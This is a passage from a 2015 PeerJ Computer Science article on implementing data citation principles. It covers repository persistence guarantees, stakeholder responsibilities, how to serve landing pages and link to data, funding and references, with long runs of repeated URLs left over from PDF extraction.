https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ https://creativecommons.org/publicdomain/zero/1.0/ http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://www.w3.org http://dx.doi.org/10.7717/peerj-cs.1 Persistence guarantees The topic of persistence guarantees is important from the standpoint of what repository owners and managers should provide to support JDDCP-compliant citable persistent data. It is closely related to the question of persistent identifiers, that is, the identifiers must always resolve somewhere, and as noted above, this should be to a landing page. But in the widest sense, persistence is a matter of service guarantees. Organizations providing trusted repositories for citable data need to detail their persistence policies transparently to users. We recommend that all organizations endorsing the JDDCP adopt a Persistence Guarantee for data and metadata based on the following template: “[Organization/Institution Name] is committed to maintaining persistent identifiers in [Repository Name] so that they will continue to resolve to a landing page providing meta- data describing the data, including elements of stewardship, provenance, and availability. [Organization/Institution Name] has made the following plan for organizational persis- tence and succession: [plan].” As noted in the Landing pages section, when data is de-accessioned, the landing page should remain online, continuing to provide persistent metadata and other information including a notation on data de-accessioning. Authors and scholarly article publishers will decide on which repositories meet their persistence and stewardship requirements based on the guarantees provided and their overall experience in using various repositories. Guarantees need to be supported by operational practice. IMPLEMENTATION: STAKEHOLDER RESPONSIBILITIES Research communications are made possible by an ecosystem of stakeholders who prepare, edit, publish, archive, fund, and consume them. Each stakeholder group endorsing the JDDCP has, we believe, certain responsibilities regarding implementation of these recommendations. They will not all be implemented at once, or homogeneously. But careful adherence to these guidelines and responsibilities will provide a basis for achieving the goals of uniform scholarly data citation. 1. Archives and repositories: (a) Identifiers, (b) resolution behavior, (c) landing page metadata elements, (d) dataset description and (e) data access methods, should all conform to the technical recommendations in this article. 2. Registries: Registries of data repositories such as databib (http://databib.org) and r3data (http://www.re3data.org) should document repository conformance to these recommendations as part of their registration process, and should make this information readily available to researchers and the public. This also applies to lists of “recommended” repositories maintained by publishers, such as those maintained by Nature Scientific Data (http://www.nature.com/sdata/data-policies/repositories) and F1000Research (http://f1000research.com/for-authors/data-guidelines). 3. Researchers: Researchers should treat their original data as first-class research objects. They should ensure it is deposited in an archive that adheres to the practices described Starr et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.1 14/22 https://peerj.com/computer-science/ http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://www.re3data.org http://www.re3data.org http://www.re3data.org http://www.re3data.org http://www.re3data.org http://www.re3data.org http://www.re3data.org http://www.re3data.org http://www.re3data.org http://www.re3data.org http://www.re3data.org http://www.re3data.org http://www.re3data.org http://www.re3data.org http://www.re3data.org http://www.re3data.org http://www.re3data.org http://www.re3data.org http://www.re3data.org http://www.re3data.org http://www.re3data.org http://www.re3data.org http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://f1000research.com/for-authors/data-guidelines http://dx.doi.org/10.7717/peerj-cs.1 here. We also encourage authors to publish preferentially with journals which implement these practices. 4. Funding agencies: Agencies and philanthropies funding research should require that recipients of funding follow the guidelines applicable to them. 5. Scholarly societies: Scholarly societies should strongly encourage adoption of these practices by their members and by publications that they oversee. 6. Academic institutions: Academic institutions should strongly encourage adoption of these practices by researchers appointed to them and should ensure that any institutional repositories they support also apply the practices relevant to them. CONCLUSION These guidelines, together with the NISO JATS 1.1d2 XML schema for article publishing (National Center for Biotechnology Information, 2014), provide a working technical basis for implementing the Joint Data Citation Principles. They were developed by a cross-disciplinary group hosted by the Force11.org digital scholarship com- munity. 7 Data Citation Implementation Group (DCIG, https://www.force11.org/ 7 Force11.org (http://force11.org) is a community of scholars, librarians, archivists, publishers and research funders that has arisen organically to help facilitate the change toward improved knowledge creation and sharing. It is incorporated as a US 501(c)3 not-for-profit organization in California. datacitationimplementation), during 2014, as a follow-on project to the successfully concluded Joint Data Citation Principles effort. Registries of data repositories such as r3data (http://r3data.org) and publishers’ lists of “recommended” repositories for cited data, such as those maintained by Nature Publications (http://www.nature.com/sdata/data-policies/repositories), should take ongoing note of repository compliance to these guidelines, and provide compliance checklists. We are aware that some journals are already citing data in persistent public repositories, and yet not all of these repositories currently meet the guidelines we present here. Compliance will be an incremental improvement task. Other deliverables from the DCIG are planned for release in early 2015, including a review of selected data-citation workflows from early-adopter publishers (Nature, Biomed Central, Wiley and Faculty of 1000). The NISO-JATS version 1.1d2 revision is now considered a stable release by the JATS Standing Committee, and is under final review by the National Information Standards Organization (NISO) for approval as the updated ANSI/NISO Z39.96-2012 standard. We believe it is safe for publishers to use the 1.1d2 revision for data citation now. A forthcoming article in this series will describe the JATS revisions in detail. We hope that publishing this document and others in the series will accelerate the adoption of data citation on a wide scale in the scholarly literature, to support open validation and reuse of results. Integrity of scholarly data is not a private matter, but is fundamental to the validity of published research. If data are not robustly preserved and accessible, the foundations of published research claims based upon them are not verifiable. As these practices and guidelines are increasingly adopted, it will no longer be acceptable to credibly assert any Starr et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.1 15/22 https://peerj.com/computer-science/ https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation http://r3data.org http://r3data.org http://r3data.org http://r3data.org http://r3data.org http://r3data.org http://r3data.org http://r3data.org http://r3data.org http://r3data.org http://r3data.org http://r3data.org http://r3data.org http://r3data.org http://r3data.org http://r3data.org http://r3data.org http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://dx.doi.org/10.7717/peerj-cs.1 claims whatsoever that are not based upon robustly archived, identified, searchable and accessible data. We welcome comments and questions which should be addressed to the forcnet@googlegroups.com open discussion forum. ACKNOWLEDGEMENTS We are particularly grateful to PeerJ Academic Editor Harry Hochheiser (University of Pittsburgh), reviewer Tim Vines (University of British Columbia), and two anonymous reviewers, for their careful, very helpful, and exceptionally timely comments on the first version of this article. Many thanks as well to Virginia Clark (Université Paul Sabatier), John Kunze (California Digital Library) and Maryann Martone (University of California at San Diego) for their thoughtful suggestions on content and presentation. APPENDIX Serving landing pages: implementation details Ideally, all versions of the landing page would be resolvable from a single URI through content negotiation (Holtzman & Mutz, 1998), serving an HTML representation for humans and the appropriate form for automated agents. In its simplest form, content negotiation uses the HTTP Accept and/or Accept-Language headers to vary the content returned based on media type (a.k.a. MIME type) and language. ARK-style inflections propose an alternate way to retrieve machine-readable metadata without requiring content negotiation. Some web servers have provision to serve alternate documents by using file names that only vary by extension; when the document is requested without an extension, the web server returns the file highest rated by the request’s Accept header. Enabling this feature typically requires the intervention of the web server administrator and thus may not be available to all publishers. The content negotiation standard also allows servers to assign arbitrary tags to documents and for user agents to request documents that match a given tag using the Accept-Features header. This could allow for selection between documents that use the same media type but use different metadata standards. Although we believe that content negotiation is the best long-term solution to make it easier to provide for automated agents, this may require building systems to manage landing page content or adapting existing content management systems (CMS). For a near-term solution, we recommend web linking (Nottingham, 2010). Web linking requires assigning a separate resolvable URI for each variant representation of the landing page. As each alternative has a URI, the documents can be cached reliably without requiring additional requests to the server hosting the landing pages. Web linking also allows additional relationships to be defined, so that it can also be used to direct automated agents to landing pages for related data as well as alternatives. Web linking also allows for a title to be assigned to each link, should they be presented to a human: Starr et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.1 16/22 https://peerj.com/computer-science/ mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com http://dx.doi.org/10.7717/peerj-cs.1 Link: “uri-to-an-alternate” rel=“alternate” media=“application/xml” title=“title” We recommend including in the title the common names of the metadata schema(s) used, such as DataCite or DCAT, to allow automated agents to select the appropriate alternative. As an additional fallback, we also recommend using HTML <link> elements to duplicate the linking information in the HTML version of the landing page: <link href=“uri-to-an-alternate”;rel=“alternate”; media=“application/xml”;title=“title”> Embedding the information in the HTML has the added benefit of keeping the alternate information attached if the landing page is downloaded from a standard web browser. This is not the case for web linking through HTTP headers, nor for content negotiation. In addition, content negotiation may not send back the full list of alternatives without the user agent sending a Negotiate: vlist header (Shepherd et al., 2014). As each of the three techniques have points where they have advantages over the others we recommend a combination of the three approaches for maximum benefit, but acknowledge that some may take more effort to implement. Serving landing pages: linking to the data Note that the content being negotiated is the metadata description of the research data. The data being described should not be served via this description URI. Instead, the landing page data descriptions should reference the data. If the data is available from a single file, directly available on the internet, use the DCAT downloadURL to indicate the location of the data. If the data is available as a relatively small number of files, either as parts of the whole collection, mirrored at multiple locations, or as multiple packaged forms, link to an ORE resource map (Lagoze et al., 2008) to describe the relationships between the files. If the data requires authentication to access, use the DCAT accessURL to indicate a page with instructions on how to request access to the data. This technique can also be used to describe the procedures on accessing physical samples or other non-digital data. If the data is available online but is excessive in volume, use the DCAT accessURL to link to the appropriate search system to access the data. For data systems that are available either as bulk downloads or through sub-setting services, include both accessURL and downloadURL on the landing page. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was funded in part by generous grants from the US National Institutes of Health and National Aeronautics and Space Administration, the Alfred P. Sloan Foundation, and the European Union (FP7). Support from the National Institutes of Health (NIH) Starr et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.1 17/22 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.1 was provided via grant # NIH 1U54AI117925-01 in the Big Data to Knowledge program, supporting the Center for Expanded Data Annotation and Retrieval (CEDAR). Support from the National Aeronautics and Space Administration (NASA) was provided under Contract NNG13HQ04C for the Continued Operation of the Socioeconomic Data and Applications Center (SEDAC). Support from The Alfred P. Sloan Foundation was provided under two grants: a. Grant # 2012-3-23 to the Harvard Institute for Quantitative Social Sciences, “Helping Journals to Upgrade Data Publication for Reusable Research”; and b. a grant to the California Digital Library, “CLIR/DLF Postdoctoral Fellowship in Data Curation for the Sciences and Social Sciences”. The European Union partially supported this work under the FP7 contracts #269977 supporting the Alliance for Permanent Access and #269940 supporting Digital Preservation for Timeless Business Processes and Services. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: National Institutes of Health (NIH): # NIH 1U54AI117925-01. Alfred P. Sloan Foundation: #2012-3-23. European Union (FP7): #269977, #269940. National Aeronautics and Space Administration (NASA): NNG13HQ04C. Competing Interests The authors declare there are no competing interests. Author Contributions • Joan Starr and Tim Clark conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Eleni Castro, Mercè Crosas, Michel Dumontier, Robert R. Downs, Ruth Duerr, Laurel L. Haak, Melissa Haendel, Ivan Herman, Simon Hodson, Joe Hourclé, John Ernest Kratz, Jennifer Lin, Lars Holm Nielsen, Amy Nurnberger, Stefan Proell, Andreas Rauber, Simone Sacchi, Arthur Smith and Mike Taylor performed the experiments, analyzed the data, performed the computation work, reviewed drafts of the paper. REFERENCES Accomazzi A, Henneken E, Erdmann C, Rots A. 2012. Telescope bibliographies: an essential component of archival data management and operations. In: Society of Photo-Optical Instrumentation Engineers (SPIE) conference series. vol. 8448. Article id 84480K, 10 pp DOI 10.1117/12.927262. Alsheikh-Ali AA, Qureshi W, Al-Mallah MH, Ioannidis JPA. 2011. Public availability of published research data in high-impact journals. PLoS ONE 6(9):e24357 DOI 10.1371/journal.pone.0024357. Starr et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.1 18/22 https://peerj.com/computer-science/ http://dx.doi.org/10.1117/12.927262 http://dx.doi.org/10.1371/journal.pone.0024357 http://dx.doi.org/10.7717/peerj-cs.1 Altman M, Crosas M. 2013. The evolution of data citation: from principles to implementation. IAssist Quarterly (Spring):62–70. Available at http://www.iassistdata.org/iq/ evolution-data-citation-principles-implementation. Altman M, King G. 2006. A proposed standard for the scholarly citation of quantitative data. DLib Magazine 13(3/4). Available at http://www.dlib.org/dlib/march07/altman/03altman.html. Ball A, Duke M. 2012. How to cite datasets and link to publications. Technical report. DataCite. Available at http://www.dcc.ac.uk/resources/how-guides. Begley CG, Ellis LM. 2012. Drug development: raise standards for preclinical cancer research. Nature 483(7391):531–533 DOI 10.1038/483531a. Berners-Lee T, Fielding R, Masinter L. 1998. RFC2396: Uniform resource identifiers (URI): generic syntax. Available at https://www.ietf.org/rfc/rfc2396.txt. Booth D, Haas H, McCabe F, Newcomer E, Champion M, Ferris C, Orchard D. 2004. Web services architecture: W3C working group note 11 February 2004. Technical Report. World Wide Web Consortium. Available at http://www.w3.org/TR/ws-arch/. Borgman C. 2012. Why are the attribution and citation of scientific data important? In: Uhlir P, ed. For attribution—Developing Data Attribution and Citation Practices and Standards. Summary of an international Workshop. Washington D.C.: National Academies Press. Bray T, Paoli J, Sperberg-McQueen CM, Maler E, Yergeau F. 2008. Extensible markup language (XML) 1.0 (fifth edition): W3C recommendation 26 November 2008. Available at http://www. w3.org/TR/REC-xml/. Clark A, Evans P, Strollo A. 2014. FDSN recommendations for seismic network DOIs and related FDSN services, version 1.0. Technical report. International Federation of Digital Seismograph Networks. Available at http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf. CNRI. 2014. Handle system: unique and persistent identifiers for internet resources. Available at http://www.w3.org/TR/webarch/#identification. CODATA-ICSTI Task Group on Data Citation Standards and Practices. 2013. Out of cite, out of mind: the current state of practice, policy and technology for data citation. Data Science Journal 12(September):1–75 DOI 10.2481/dsj.OSOM13-043. Colquhoun D. 2014. An investigation of the false discovery rate and the misinterpretation of p-values. Royal Society Open Science 1(3):140216 DOI 10.1098/rsos.140216. Data Citation Synthesis Group. 2014. Joint declaration of data citation principles. Available at http://force11.org/datacitation. Data Documentation Initiative. 2012. Data documentation initiative specification. Available at http://www.ddialliance.org/Specification/. DataCite Metadata Working Group. 2014. Datacite metadata schema for the publication and citation of research data, version 3.1 October 2014. Available at http://schema.datacite.org/meta/ kernel-3.1/doc/DataCite-MetadataKernel v3.1.pdf. DCAT Application Profile Working Group. 2013. DCAT application profile for data portals in Europe. Available at https://joinup.ec.europa.eu/asset/dcat application profile/asset release/ dcat-application-profile-data-portals-europe-final. Dublin Core Metadata Initiative. 2012. Dublin core metadata element set, version 1.1. Available at http://dublincore.org/documents/dces/. Dyson E. 2003. Online registries: the DNS and beyond. Available at http://doi.contentdirections. com/reprints/dyson excerpt.pdf. Starr et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.1 19/22 https://peerj.com/computer-science/ http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html 